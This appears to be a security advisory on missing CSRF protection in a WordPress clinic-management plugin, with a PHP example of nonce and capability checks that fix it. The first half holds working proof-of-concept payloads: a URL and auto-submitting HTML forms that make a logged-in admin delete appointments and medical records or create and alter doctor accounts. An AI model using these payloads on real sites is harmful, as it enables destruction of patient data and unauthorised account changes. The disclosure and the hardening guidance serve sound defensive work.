The plugin does not perform CSRF checks (they are either flawed or missing entirely) in various AJAX actions, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks. This includes, but is not limited to: deleting arbitrary appointments/medical records/etc., and creating/updating various users (patients, doctors, etc.).
Make a logged-in admin open the following URL to make them delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1
Make a logged-in admin open a page with the HTML code below.
To make them delete the medical record with ID 1:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="route_name" value="medical_records_delete"/>
<input type="text" name="id" value="1">
<input type="submit" value="submit">
</form>
</body>
To make them create a new doctor:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="user_email" value="[email protected]">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
To edit an existing doctor, add the ID and the correct email to the code above, e.g.
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="ID" value="8">
<input type="text" name="user_email" value="[email protected]">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
(This will change their name, mobile number and gender, as well as reset their specialisation, etc.)
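As an added example (not the plugin's own code), the two checks whose absence makes the requests above possible, shown on a minimal admin-ajax.php route dispatcher modelled on the action/route_name pattern in the advisory. The handler names, the record-deletion helper and the capability names are hypothetical; only the action and route names come from the advisory.

```php
<?php
// Added example, not the plugin's code. Route names (appointment_delete,
// medical_records_delete) and the ajax_post action come from the advisory;
// everything else is a hypothetical stand-in.

// VULNERABLE shape: dispatches purely on route_name. No nonce, no capability
// check, so any request a victim's browser can be made to send is honoured.
function vuln_ajax_post() {
    $route = isset($_POST['route_name']) ? sanitize_key($_POST['route_name']) : '';
    if ($route === 'medical_records_delete') {
        clinic_delete_medical_record(absint($_POST['id'])); // hypothetical helper
    }
    wp_die();
}

// HARDENED shape: a nonce bound to this action proves the request originated
// from the plugin's own UI, and a per-route capability check confirms the
// user is allowed to perform that specific operation.
function hardened_ajax_post() {
    // Dies with HTTP 403 if _ajax_nonce is absent or not valid for this action.
    check_ajax_referer('clinic_ajax_post', '_ajax_nonce');

    $route = isset($_POST['route_name']) ? sanitize_key($_POST['route_name']) : '';
    $required_cap = array( // hypothetical capability names
        'appointment_delete'     => 'clinic_delete_appointments',
        'medical_records_delete' => 'clinic_delete_medical_records',
    );
    if (!isset($required_cap[$route]) || !current_user_can($required_cap[$route])) {
        wp_send_json_error(array('message' => 'forbidden'), 403);
    }
    switch ($route) {
        case 'medical_records_delete':
            clinic_delete_medical_record(absint($_POST['id']));
            break;
        case 'appointment_delete':
            clinic_delete_appointment(absint($_POST['id'])); // hypothetical helper
            break;
    }
    wp_send_json_success();
}
// Register only the hardened handler. The GET-based ajax_get action from the
// advisory needs the same treatment on its own wp_ajax_ajax_get hook.
add_action('wp_ajax_ajax_post', 'hardened_ajax_post');

// Legitimate requests obtain the nonce server-side, e.g. handed to the
// plugin's script via wp_localize_script(), and send it as _ajax_nonce:
//   wp_localize_script('clinic-admin', 'clinicAjax',
//       array('nonce' => wp_create_nonce('clinic_ajax_post')));
```

A cross-site form like the ones above cannot supply a valid `_ajax_nonce`, so the hardened handler rejects it before any route code runs; the capability map additionally stops a low-privileged but authenticated user from reaching delete routes even with a nonce of their own.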